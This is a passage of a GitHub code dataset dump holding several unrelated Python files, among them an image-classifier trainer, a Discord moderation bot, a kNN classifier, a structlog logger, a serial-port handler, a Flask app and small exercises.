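\n                # Hedged note (added): the metrics above are averages over the\n                # reporting interval, so the running totals are reset below.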
\n                \n                #turn our running loss back to zero \n                running_loss=0\n                model.train()\n    \n    \n    \n    time_elapsed = time.time() - start\n    print(\"\\nTotal time: {:.0f}m {:.0f}s\".format(time_elapsed//60, time_elapsed % 60))\n\n    return model\n#------------------------------------------------\ntrained_model= train_model(model,criterion,optimizer,epochs)\n\n#------------------------------------------------\n\ndef save_model(trained_model):\n    '''\n    function saves our trained model\n    input: model\n    '''\n    trained_model.class_to_idx = image_datasets['train'].class_to_idx\n    trained_model.cpu()\n    save_dir= ''\n    #checkpoint dictionary\n    check_point= {\n        'epochs': epochs,\n        'arch': arch,\n        'hidden_units': hidden_units,\n        'classifier': trained_model.classifier,\n        'state_dict': trained_model.state_dict(),\n        'class_to_idx': trained_model.class_to_idx\n        }\n    if args.save_dir:\n        save_dir=args.save_dir\n    else:\n        save_dir='checkpoint.pth'\n    torch.save(check_point, save_dir)\n#------------------------------------------------\nsave_model(trained_model)\nprint('-' * 10)\nprint(trained_model)\nprint('your model has been successfully saved!')\nprint('-' * 10)\n\n#------------------------------------------------\n\n\n\n\n\n\n\n    \n","repo_name":"ReemHassab/build-your-own-image-classifier","sub_path":"train-2.py","file_name":"train-2.py","file_ext":"py","file_size_in_byte":9464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15878775382","text":"import subprocess as sp\nimport json\nimport re\n\n\nclass SubtitleRow:\n    def __init__(self, gps: str, alt:float, h_speed: float, v_speed: float) -> None:\n        self.h_speed = h_speed\n        self.v_speed = v_speed\n        self.alt = alt\n        self.lon, self.lat = [float(x) for x in gps[5:-1].split(', ')][:2]\n\nclass SubtitleExtractor:\n    def __init__(self) -> None:\n        pass\n\n    def __call__(self, video_path: str) -> dict:\n        out = sp.run(['ffprobe','-of','json','-show_entries', 'format:stream', video_path],\\\n            stdout=sp.PIPE, stderr=sp.PIPE, universal_newlines=True)\n\n        results = json.loads(out.stdout)\n        \n        metadata_format = results['format']['tags']\n        \n        out = sp.run(['ffmpeg','-i',video_path, '-map', 's:0', '-f','webvtt','-'],\\\n            stdout=sp.PIPE, stderr=sp.PIPE, universal_newlines=True)\n        \n        subtitle = out.stdout\n        \n        parsed_subtitle = self.__parse_subtitle(subtitle)\n        \n        return parsed_subtitle\n\n    def __parse_subtitle(self, subtitle: str) -> dict:\n        subtitle = subtitle.split('\\n')[2:]\n        \n        parsed = {}\n        \n        for i in range(0, len(subtitle), 4):\n            m, s = subtitle[i].split(' ')[0].split('.')[0].split(':')\n            timestamp = int(m) * 60 + int(s)\n            \n            row = subtitle[i+1]\n            \n            gps = re.search(r'GPS \\([0-9]+\\.[0-9]+, [0-9]+\\.[0-9]+, [0-9]+\\)', row)[0]\n            h_s = float(re.search(r'H.S -*[0-9]+\\.[0-9]+', row)[0].split(' ')[1])\n            v_s = float(re.search(r'V.S -*[0-9]+\\.[0-9]+', row)[0].split(' ')[1])\n            alt = float(re.search(r'H -*[0-9]+\\.[0-9]+', row)[0].split(' ')[1])\n\n            parsed[timestamp] = SubtitleRow(gps, alt, h_s, v_s)\n        \n        return parsed\n    \n    \n    \n","repo_name":"PUTvision/UAVBillboards","sub_path":"app/src/subtitle_extractor.py","file_name":"subtitle_extractor.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"40861023265","text":"from typing import MutableMapping, Optional\nimport discord\nfrom discord import mentions\nfrom discord.embeds import Embed\nfrom discord.errors import ConnectionClosed\nfrom discord.ext import commands\nimport 
sqlite3\nimport aiofiles\nimport asyncio\nimport re\nimport aiosqlite\nimport time\ni = 1\ntime_regex = re.compile(\"(?:(\\d{1,5})(h|s|m|d))+?\")\ntime_dict = {\"h\":3600, \"s\":1, \"m\":60, \"d\":86400}\n\n\n\n\n\nclass TimeConverter(commands.Converter):\n async def convert(self, ctx, argument):\n args = argument.lower()\n matches = re.findall(time_regex, args)\n time = 0\n for v, k in matches:\n try:\n time += time_dict[k]*float(v)\n except KeyError:\n raise commands.BadArgument(\"{} is an invalid time-key! h/m/s/d are valid!\".format(k))\n except ValueError:\n raise commands.BadArgument(\"{} is not a number!\".format(v))\n return time\n\n\nclass moderation(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n @commands.has_permissions(manage_roles=True)\n async def mute(self, ctx, member : discord.Member, time: TimeConverter, *, reason = None):\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\")\n await member.add_roles(role)\n await ctx.send((\"Muted {} for {}s\" if time else \"Muted {}\").format(member, time))\n type = \"Mute\"\n warndb = sqlite3.connect(\"./moderation/logs/logs.db\")\n warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, time, type))\n warndb.commit()\n if time:\n await asyncio.sleep(time)\n await member.remove_roles(role)\n else:\n return\n\n\n\n #Warning sys \n @commands.command(name='warn')\n @commands.has_permissions(kick_members=True)\n async def warn(self, ctx, member : discord.Member, *, reason):\n type = \"warn\"\n duration = \"None\"\n warndb = await aiosqlite.connect(\"./moderation/logs/logs.db\")\n await warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n await warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, duration , type))\n await warndb.commit()\n await ctx.reply(f\"Warned user {member.display_name}! \", mention_author=True)\n try:\n await warndb.close()\n except ConnectionClosed:\n pass\n\n\n#Modlogs\n @commands.command(name='modlogs')\n @commands.guild_only()\n @commands.has_permissions(kick_members=True)\n async def modlogs(self, ctx, member: discord.Member ):\n warndb = await aiosqlite.connect('./moderation/logs/logs.db')\n index = 0\n embed = discord.Embed(name=f\"Showing modlogs for {member.id}\", description = \"___ ___\", color = discord.Color.red())\n msg = await ctx.send(embed=embed)\n try:\n async with warndb.execute('SELECT admin_id, reason, logtype, duration FROM logs WHERE guild_id = ? 
AND user_id = ?', (ctx.guild.id, member.id,)) as cursor:\n                async for entry in cursor:\n                    admin_id, reason, logtype, duration = entry\n                    admin_name = self.bot.get_user(admin_id)\n                    index += 1\n                    embed.add_field(name=f\"**Case:**{index}\", value=f\"**User:**({member.id}){member.mention}\\n **Type:**{logtype}\\n **Admin:**{admin_name.name}#{admin_name.discriminator}\\n **Reason:**{reason}\\n **Duration:**{duration}\", inline=False)\n                    await msg.edit(embed=embed)\n            await warndb.close()\n        except ConnectionClosed:\n            pass\n\n\n\n    @commands.command(name='ban')\n    @commands.has_permissions(ban_members=True)\n    async def ban(self, ctx, member : discord.Member = None, *, reason):\n        logchannel = self.bot.get_channel(894251500392570881)\n        type = \"Ban\"\n\n        if member is not None:\n            if member is not ctx.author:\n                await member.ban(reason=reason)\n\n                warndb = sqlite3.connect(\"./moderation/logs/logs.db\")\n                warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n                warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, None, type))\n                warndb.commit()\n                embed = discord.Embed(description =f\" **Banned user✅ ** {member.mention} Moderator: {ctx.author.mention} Reason: {reason} \")\n                await logchannel.send(embed=embed)\n            else:\n                await ctx.reply(\"You can't ban yourself!\")\n        else:\n            await ctx.reply(\"The member is either not found or something went wrong!\")\n    \n    @commands.command(name='kick')\n    @commands.has_permissions(kick_members=True)\n    async def kick (self, ctx, member : discord.Member = None, *, reason):\n        type = \"Kick\"\n        logchannel = self.bot.get_channel(894251500392570881)\n\n        if member is not None:\n            if member is not ctx.author:\n                await member.kick(reason=reason)\n                warndb = sqlite3.connect(\"./moderation/logs/logs.db\")\n                warndb.execute(\"CREATE TABLE IF NOT EXISTS logs (guild_id int, admin_id int, user_id int, reason text, duration text, logtype text)\")\n                warndb.execute('INSERT OR IGNORE INTO logs (guild_id, admin_id, user_id, reason, duration, logtype) VALUES (?,?,?,?,?,?)', (ctx.guild.id, ctx.author.id, member.id, reason, None, type))\n                warndb.commit()\n                embed = discord.Embed(description =f\" **Kicked user✅ ** {member.mention} Moderator: {ctx.author.mention} Reason: {reason} \")\n                await ctx.send(embed=embed)\n                await logchannel.send(embed=embed)\n            else:\n                return await ctx.reply(\"You can not kick yourself!\")\n        else:\n            await ctx.reply(\"Either the member was not found or something went wrong!\")\n\n\n\n    @commands.command(name='clear')\n    @commands.has_permissions(manage_messages=True)\n    async def clear (self, ctx, amount = 100):\n        await ctx.channel.purge(limit=1)\n        await ctx.channel.purge(limit = amount)\n        await ctx.send(\"Channel Cleared!\")\n    \n\n\n    @commands.command(name='delchannel')\n    @commands.has_permissions(kick_members=True)\n    async def remove_channel(self, ctx, channel : discord.TextChannel):\n        await channel.delete()\n        await ctx.send(\"Channel deleted!\")\n    \n    @commands.command(name='ping')\n    async def ping(self, ctx):\n        msg = await ctx.send(\"Getting Ping....\")\n        await asyncio.sleep(2)\n        await msg.edit(content='Pong! `{0} ms `'.format(round(self.bot.latency * 1000)))
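\n        # Hedged note (added): discord.py reports bot.latency in seconds, so it is\n        # multiplied by 1000 above to display milliseconds.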
\n    \n\n    @commands.command(name='apr')\n    @commands.has_permissions(ban_members = True)\n    async def apr(self, ctx):\n        embed = discord.Embed(name='**#Apply channel rules and instructions!**', color = discord.Color.red())\n\n        embed.set_thumbnail(url= ctx.guild.icon_url)\n        embed.add_field(name='***Rules and instructions***', value=\"Instructions on how to apply and what to/not to do.\", inline=False)\n        embed.add_field(name='**How to apply?**', value=\"To apply go to <#911671525277569044> and type v!apply\")\n        embed.add_field(name='**What will happen once I have typed v!apply?**', value=\"The bot will dm you asking you if you wish to start. To start type v!answer. The bot will load all questions and then send them one by one. With every question you are allowed to type your answer (with spaces) before it sends the next one. Do that until a confirmation screen pops up with a review of your answers. There will be two buttons under that screen with a ✅ or ❌. Pressing the checkmark will confirm your application and send it. Pressing the cross mark will cancel it. You'll need to type v!answer again.\", inline=False)\n        embed.add_field(name=\"**What happens once I have sent the application?**\", value=\"The application will be reviewed and you will get a dm from the bot once you are accepted or denied. Depending on the result a staff team member will contact you about it.\", inline=False)\n        embed.add_field(name=\"**Why did my message get deleted in ☄˚˚✎apply「📝」 ?**\", value=\"Messages in #apply will be instantly deleted to prevent clutter and for these rules to stay visible. This **DOES NOT** mean the command will not work!\", inline=False)\n        embed.add_field(name=\"**It says my application got deleted because something was wrong?**\", value=\"It seems you either failed to answer the questions correctly or entered false or spamming answers. Please re-apply with the correct format!\", inline=False)\n        embed.add_field(name=\"**NOTE:**\", value=\"Do **NOT** apply more than once. This messes up the application system and will cause your application to be deleted straight away. 
If it encounters any error dm <@521028748829786134> with the error code instead!\", inline=False)\n        embed.set_footer(text=\"Made by Senpai_Desi#4108\")\n        await ctx.send(embed=embed)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef setup(bot):\n    bot.add_cog(moderation(bot))","repo_name":"SenpaiDesi/Vandals-Bot","sub_path":"moderation/moderation.py","file_name":"moderation.py","file_ext":"py","file_size_in_byte":9553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"2804689536","text":"#Importing required libraries\r\nimport numpy as np\r\nfrom sklearn import preprocessing, model_selection, neighbors\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd \r\n\r\n#Creating a data frame with pandas\r\ndf = pd.read_csv('breast-cancer-wisconsin.data.txt')\r\n\r\n#Could get away with dropping samples with missing values; however, it is better practice to turn them into extreme outliers.\r\n#df.dropna('?')\r\ndf.replace('?', -99999, inplace=True)\r\n\r\n#ID is arbitrary and does not contribute towards prediction\r\ndf.drop(['id'], 1, inplace=True)\r\n\r\n#Create feature and class matrices to train the algorithm on\r\nX = np.array(df.drop(['class'], 1))\r\ny = np.array(df['class'])\r\n\r\n#Train a model\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X,y,test_size=0.25)\r\nclf = neighbors.KNeighborsClassifier()\r\nclf.fit(X_train, y_train)\r\n\r\n#Testing accuracy of this model\r\naccuracy = clf.score(X_test, y_test)\r\nprint(accuracy)\r\n#Note: accuracy ranges from roughly 0.94 to 0.96 between runs because the train/test split is randomized each time.\r\n\r\n#Testing unseen data i.e. new patient\r\n#new_patient = np.array([3,2,5,1,1,2,10,8,4])\r\n#diagnosis = clf.predict(new_patient)\r\n#print(diagnosis)","repo_name":"zoltanmathias/Diagnosing-breast-cancer-with-nearest-neighbors","sub_path":"kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"294311488","text":"\"\"\"Provides a class Logger with methods for logging.\"\"\"\nfrom contextlib import contextmanager\nfrom dataclasses import dataclass\nimport logging\nimport os\nimport sys\nimport threading\nfrom typing import cast, Any, Callable, Dict, Generator, List, MutableMapping, Tuple, Type, Union\n\nimport structlog\nfrom structlog.stdlib import BoundLogger, get_logger as get_bound_logger\n\n\n@dataclass(frozen=True)\nclass EventName:\n    \"\"\"Dataclass for log event names.\n\n    Args:\n        name: name of this event\n    \"\"\"\n\n    name: str\n\n\nclass LogEventMeta(type):\n    \"\"\"Metaclass for LogEvents. 
This allows EventNames to be specified in subclasses of BaseLogEvent\n    as empty typed variables e.g.\n\n        AuthToAccountStart: EventName\n\n    Rather than requiring\n\n        AuthToAccountStart: EventName(\"AuthToAccountStart\")\n    \"\"\"\n\n    def __new__(\n        mcs, name: str, bases: Tuple[Type, ...], namespace: Dict[str, Any]\n    ) -> \"LogEventMeta\":\n        for annotation in namespace.get(\"__annotations__\", []):\n            namespace[annotation] = EventName(annotation)\n        return cast(LogEventMeta, super().__new__(mcs, name, bases, namespace))\n\n\n@dataclass(frozen=True)\nclass BaseLogEvent(metaclass=LogEventMeta):\n    \"\"\"Base class for LogEvent classes\"\"\"\n\n\nclass Singleton(type):\n    \"\"\"Singleton Metaclass\"\"\"\n\n    _instances: Dict[Type[Any], Any] = {}\n\n    def __call__(cls, *args: Any, **kwargs: Union[int, str, Dict]) -> Any:\n        if cls not in cls._instances:\n            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n        return cls._instances[cls]\n\n\nclass BaseLogger:\n    \"\"\"Provides contextmanager 'bind' which can be used to bind\n    keys to the logger using 'with' syntax; they will be removed from the logger\n    in subsequent calls. In general use Logger, not BaseLogger directly.\"\"\"\n\n    def __init__(self, log_tid: bool = True, pretty_output: bool = False) -> None:\n        self._log_tid = log_tid\n        self.logger_stack = threading.local()\n        self.pretty_output = pretty_output\n        log_processors: List[\n            Union[\n                structlog.dev.ConsoleRenderer,\n                structlog.processors.JSONRenderer,\n                Callable[[logging.Logger, str, MutableMapping[str, Any]], MutableMapping[str, Any]],\n            ]\n        ] = [\n            structlog.stdlib.add_log_level,\n            structlog.stdlib.filter_by_level,\n            structlog.processors.TimeStamper(fmt=\"iso\"),\n            structlog.processors.StackInfoRenderer(),\n            structlog.processors.format_exc_info,\n        ]\n\n        if os.environ.get(\"DEV_LOG\", \"0\") == \"1\" or self.pretty_output:\n            log_processors.append(structlog.dev.ConsoleRenderer(colors=True, force_colors=True))\n        else:\n            log_processors.append(structlog.processors.JSONRenderer(sort_keys=True))\n\n        structlog.configure(\n            logger_factory=structlog.stdlib.LoggerFactory(), processors=log_processors\n        )\n        \"\"\"\n        altimeter/core/log.py:83: error: Argument \"processors\" to \"configure\" has incompatible type\n        \"List[object]\"; expected\n        \"Optional[Iterable[Callable[[Any, str, MutableMapping[str, Any]], Union[Mapping[str, Any], str, bytes, Tuple[Any, ...]]]]]\"\n        \"\"\"\n\n        logging.basicConfig(\n            level=os.environ.get(\"LOG_LEVEL\", \"INFO\"), stream=sys.stdout, format=\"%(message)s\"\n        )\n        logging.getLogger(\"botocore\").setLevel(logging.ERROR)\n\n    def _get_loggers(self) -> List[BoundLogger]:\n        if not hasattr(self.logger_stack, \"loggers\"):\n            self.logger_stack.loggers = []\n        return self.logger_stack.loggers\n\n    def _get_current_logger(self) -> BoundLogger:\n        loggers = self._get_loggers()\n        if not loggers:\n            logger = get_bound_logger()\n            if self._log_tid:\n                logger = logger.bind(tid=threading.get_ident())\n            loggers.append(logger)\n        return loggers[-1]\n\n    def debug(self, event: EventName, **kwargs: Any) -> None:\n        \"\"\"Create DEBUG level log entry.\n\n        Args:\n            event: EventName object for this event\n            kwargs: log event k/vs\n        \"\"\"\n        self._get_current_logger().debug(event=event.name, **kwargs)\n\n    def info(self, event: EventName, **kwargs: Any) -> None:\n        \"\"\"Create INFO level log entry.\n\n        Args:\n            event: EventName object for this event\n            kwargs: log event k/vs\n        \"\"\"\n        self._get_current_logger().info(event=event.name, **kwargs)\n\n    def warn(self, event: EventName, **kwargs: Any) -> 
None:\n        \"\"\"Create WARN level log entry.\n\n        Args:\n            event: EventName object for this event\n            kwargs: log event k/vs\n        \"\"\"\n        self._get_current_logger().warn(event=event.name, **kwargs)\n\n    def warning(self, event: EventName, **kwargs: Any) -> None:\n        \"\"\"Create WARN level log entry.\n\n        Args:\n            event: EventName object for this event\n            kwargs: log event k/vs\n        \"\"\"\n        self._get_current_logger().warning(event=event.name, **kwargs)\n\n    def error(self, event: EventName, **kwargs: Any) -> None:\n        \"\"\"Create ERROR level log entry.\n\n        Args:\n            event: EventName object for this event\n            kwargs: log event k/vs\n        \"\"\"\n        self._get_current_logger().error(event=event.name, **kwargs)\n\n    @contextmanager\n    def bind(self, **bindings: Any) -> Generator[None, None, None]:\n        \"\"\"Context manager to bind a set of k/vs to the logger. The k/vs will be removed\n        when the with block exits.\"\"\"\n        new_logger = self._get_current_logger().bind(**bindings)\n        loggers = self._get_loggers()\n        loggers.append(new_logger)\n        try:\n            yield\n        finally:\n            loggers.pop()\n\n\nclass Logger(BaseLogger, metaclass=Singleton):\n    \"\"\"Singleton logger class\"\"\"\n\n    pass\n","repo_name":"tableau/altimeter","sub_path":"altimeter/core/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"}
{"seq_id":"71915841768","text":"########\n# author: danielle8farias@gmail.com \n# repository: https://github.com/danielle8farias\n# Description: The user enters the values of the roots and the program returns the quadratic equation they belong to.\n########\n\n#creating a function that multiplies the roots\ndef multip_raizes(x1, x2):\n    #function return\n    return x1 * x2\n\n\ndef somar_raizes(x1, x2):\n    #function return\n    return x1 + x2\n\n\ndef montar_equacao(x1, x2):\n    #calling functions inside this function and storing the returns in variables\n    b = somar_raizes(x1, x2)\n    c = multip_raizes(x1, x2)\n    #knowing that sum = -b and product = c; a = 1\n    # X² - bX + c\n\n    #conditional\n\n    #for negative b\n    #if b is negative and c is positive\n    if b < 0 and c > 0:\n        #b*-1 to strip the negative sign from b\n        print(f'The equation is: X² + {b*-1}X + {c}')\n    #else if\n    #else, if b is negative and c is too\n    elif b < 0 and c < 0:\n        print(f'The equation is: X² + {b*-1}X - {c*-1}')\n    #else, if b is negative and c equals zero\n    elif b < 0 and c == 0:\n        print(f'The equation is: X² + {b*-1}X')\n\n    #for positive b\n    #else, if b is positive and c is too\n    elif b > 0 and c > 0:\n        print(f'The equation is: X² - {b}X + {c}')\n    #else, if b is positive and c is negative\n    elif b > 0 and c < 0:\n        print(f'The equation is: X² - {b}X - {c*-1}')\n    #else, if b is positive and c equals zero\n    elif b > 0 and c == 0:\n        print(f'The equation is: X² - {b}X')\n\n    #for b equal to zero\n    #else, if b equals zero and c is positive\n    elif b == 0 and c > 0:\n        print(f'The equation is: X² + {c}')\n    #else, if b equals zero and c is negative\n    elif b == 0 and c < 0:\n        print(f'The equation is: X² - {c*-1}')\n    #else, for b and c both equal to zero\n    # elif b == 0 and c == 0:\n    else:\n        print(f'The equation is: X²')\n\n\nif __name__ == '__main__':\n    #calling the function with sample roots\n    montar_equacao(2, 3) #roots\n    montar_equacao(-2, -1)\n    montar_equacao(3, 3)\n    montar_equacao(-3, 2)\n    montar_equacao(-1, 0)\n    montar_equacao(0, 0)
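\n    # Added worked example (hypothetical extra call): roots 1 and -1 give b = 0\n    # and c = -1, so the program prints: The equation is: X² - 1\n    montar_equacao(1, -1)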
\n","repo_name":"danielle8farias-zz/hello-world-python3","sub_path":"exercicio_py/ex0031_equacao_2_grau/main_v0.py","file_name":"main_v0.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"33833196521","text":"import os\r\nimport time\r\n\r\n\r\ndef add_combo(txt):\r\n    add_combo_input = str(input(\"{} (Yes/No)\".format(txt)))\r\n    if add_combo_input == \"Yes\":\r\n        with open(\"combo.txt\", \"a+\") as FILE:\r\n            FILE.write(\"Put your combo here!\")\r\n            FILE.close()\r\n        print(\"Please add a combo!\")\r\n        time.sleep(5)\r\n        quit()\r\n    elif add_combo_input != \"No\":\r\n        print(\"I did not understand you.\")\r\n        return add_combo(txt)\r\n    else:\r\n        quit()\r\n\r\n\r\ndef del_dupli(x):\r\n    return list(dict.fromkeys(x))\r\n\r\n\r\ndef create_txt_dupli(x):\r\n    if os.path.exists(combo_dupli):\r\n        os.remove(combo_dupli)\r\n    for combo in x:\r\n        with open(combo_dupli, \"a+\") as file:\r\n            file.write(combo)\r\n            file.close()\r\n\r\n\r\ndef exist(name):\r\n    if os.path.exists(name) is not False:\r\n        # Number of lines in the combo\r\n        num_lines_combo = sum(1 for line in open(name))\r\n        print(\"There are\", num_lines_combo, \"lines in\", name)\r\n    else:\r\n        print(\"There is no {}\".format(name))\r\n\r\n\r\ncombo_dupli = \"Combo/Combo_Duplicate_Removed.txt\"\r\ndivers = \"Combo/Divers.txt\"\r\n","repo_name":"Toxi91/Trieur","sub_path":"Model/modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"24238173688","text":"import datetime as dt\nimport pickle\nimport time\nimport tkinter as tk\n\nimport serial\n\nfrom gui.base import GUI, ButtonEntry\n\n\nclass COMPortFrame(ButtonEntry):\n    \"\"\"docstring\"\"\"\n\n    # TODO migrate to frames\n\n    def __init__(self, parent, name=None, serial_idx=None):\n        alt = f\"{name.upper()} COM PORT\"\n        super(COMPortFrame, self).__init__(parent, name, alt=alt)\n\n        assert serial_idx is not None\n        self.serial_idx = serial_idx\n        # TODO fix layout\n\n    def command(self):\n        COM.set(self.serial_idx)\n\n\nclass COM:\n    \"\"\"singleton communication handler\"\"\"\n\n    ser = [None, None]\n    alms = []\n    style, text = None, None\n    startup = None\n\n    teensy, arduino = None, None\n\n    def __init__(self, startup=None):\n        print(\"initiate serial communication\")\n\n        COM.startup = startup\n\n    @classmethod\n    def build(cls, parent):\n        \"\"\"builds gui interface\"\"\"\n\n        if COM.teensy is None:\n            COM.teensy = COMPortFrame(parent, name=\"teensy\", serial_idx=0)\n        if COM.arduino is None:\n            COM.arduino = COMPortFrame(parent, name=\"arduino\", serial_idx=1)\n\n    @classmethod\n    def set(cls, idx=0):\n        \"\"\"set serial communication\"\"\"\n\n        assert COM.startup\n\n        now = dt.datetime.now().strftime(\"%B %d %Y - %I:%M%p\")\n        board = [\"TEENSY 4.1 CONTROLLER\", \"ARDUINO IO BOARD\"][idx]\n        baud = [9600, 115200][idx]\n\n        def log_message(msg):\n            try:\n                GUI.tabs[\"6\"].ElogView.insert(tk.END, f\"{now} - {msg}\")\n                value = GUI.tabs[\"6\"].ElogView.get(0, tk.END)\n                pickle.dump(value, open(\"ErrorLog\", \"wb\"))\n            except Exception as ex:\n                print(ex)\n\n        try:\n            port = \"/dev/cu.usbmodem123843001\"\n            COM.ser[idx] = serial.Serial(port, baud, timeout=10)  # , timeout=2)\n\n            text = f\"COMMUNICATIONS STARTED WITH {board}\"\n\n            # TODO: use log_message()\n            # TODO: make util.py\n\n            print(text)\n            COM.alarm(text, False)\n            log_message(text)\n            time.sleep(1)\n            COM.ser[idx].flushInput()\n            
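# Hedged note (added): flushing discards any bytes the board emitted while\n            # resetting, so the startup callback below begins with a clean input buffer.\n            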
COM.startup()\n\n        except Exception as ex:\n\n            text = f\"UNABLE TO ESTABLISH COMMUNICATIONS WITH {board}\"\n            print(text)\n            COM.alarm(text, True)\n            log_message(text)\n            raise ex\n\n    @classmethod\n    def register_alm(cls, alm):\n        \"\"\"registers alarm label\"\"\"\n        COM.alms.append(alm)\n\n    def alarm(text, red=True):\n        \"\"\"docstring\"\"\"\n\n        style = \"Warn.TLabel\" if red else \"OK.TLabel\"\n        if not style:\n            raise Exception(\"TODO get new style\")\n\n        for alm in COM.alms:\n            alm.config(text=text, style=style)\n\n    @classmethod\n    def write(cls, command, idx=0):\n        \"\"\"docstring\"\"\"\n\n        print(\"command:\", command.strip(\"\\n\"))\n        ser = COM.ser[idx]\n\n        ser.write(command.encode())\n        ser.flush()\n        response = ser.readline().strip().decode('utf-8') or ''\n\n        print(\"response:\", response or None)\n        print()\n        return response\n\n\n    @classmethod\n    def quick_write(cls,command, idx=0):\n        \"\"\"doesn't wait for a response\"\"\"\n\n        print(\"command:\", command.strip(\"\\n\"))\n        ser = COM.ser[idx]\n\n        ser.write(command.encode())\n        ser.flush()\n        print()\n        return ''\n\n\n    @classmethod\n    def close(cls):\n        \"\"\"docstring\"\"\"\n\n        print()\n        for i, ser in enumerate(COM.ser):\n            try:\n                ser.close()\n                print(f'closed {ser.port}')\n            except Exception as ex:\n                pass\n\n","repo_name":"mhyatt000/AR4","sub_path":"general/com.py","file_name":"com.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"29313012087","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n    def __init__(self, val, left, right, next):\n        self.val = val\n        self.left = left\n        self.right = right\n        self.next = next\n\"\"\"\nimport collections\n\nclass Solution(object):\n    def connect(self, root):\n        \"\"\"\n        :type root: Node\n        :rtype: Node\n        \"\"\"\n        if root is None:\n            return None\n        root.next= None\n        queue = collections.deque()\n        queue.append(root)\n        queue.append(None)\n        \n        while queue:\n            current = queue.popleft()\n            if current:\n                current.next = queue[0]\n                if current.left:\n                    queue.append(current.left)\n                if current.right:\n                    queue.append(current.right)\n            elif queue:\n                queue.append(None)\n        return root\n        \n        \n","repo_name":"rsumukha/leetcode","sub_path":"116_populating_right_pointers_in_each_node.py","file_name":"116_populating_right_pointers_in_each_node.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"10053865517","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask\nfrom config import SQLALCHEMY_DATABASE_URI, SQLALCHEMY_ECHO\nfrom flask_login import LoginManager\nfrom lunchapp.model.user import *\n\nSECRET_KEY = \"I AM HUNGRY\"\n\nlogin_manager = LoginManager()\n\n\n@login_manager.user_loader\ndef load_user(id):\n    return User.query.get(id)\n\n\n@login_manager.request_loader\ndef load_user_from_request(request):\n\n    # first, try to login using the api_key url arg\n    id = request.args.get('token')\n    if id:\n        user = User.query.get(id)\n        if user:\n            return user\n\n    # finally, return None if both methods did not login the user\n    return None\n\n\ndef create_app():\n    app = Flask(__name__)\n    app.secret_key = SECRET_KEY\n    app.config.update({\n        'SQLALCHEMY_DATABASE_URI': SQLALCHEMY_DATABASE_URI,\n        'SQLALCHEMY_ECHO': SQLALCHEMY_ECHO,\n        'SQLALCHEMY_TRACK_MODIFICATIONS': True\n    })\n    from model import db\n    from .views import init_app as viewinit\n    from .admin import admin\n    db.init_app(app)\n    viewinit(app)\n    admin.init_app(app)\n    login_manager.init_app(app)\n    return 
app\n","repo_name":"Yucheng-Ren/lunchplace","sub_path":"lunchapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43038683288","text":"from sklearn.datasets import load_iris\n\nfrom sklearn_selection import PMDiscoveryTool\n\n\ndef iris_example():\n iris = load_iris()\n x = iris.data\n y = iris.target\n\n iris_data = PMDiscoveryTool(x, x, y)\n iris_data.kneighbors_classifier_selection(weight_options=['uniform', 'distance'])\n\n\niris_example()\n\n\n","repo_name":"WillNye/MLSelectionTool","sub_path":"examples/neighbor_examples.py","file_name":"neighbor_examples.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35377619665","text":"import torchvision.transforms\nfrom torchsummary import summary\nfrom model.make_model import make_vgg19\nimport torch\nimport torch.nn as nn\nfrom torchvision import utils\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndef show_conv_weight_grid(model_layers, layer_num, visualize_type='avg', filter_index=None, nrow='auto',\n show=True, save=False, save_name=None): # feature layers\n \"\"\"make weight grid of pre-trained VGG19 (no bn)\n\n Args:\n :model_layers (nn.Sequential): layers of the model that want to make the weight grid\n\n :layer_num (int): layer to check\n\n :visualize_type ('one', 'avg'): determine how to visualize\n\n if visualize_type == one, visualize only one filter of layer 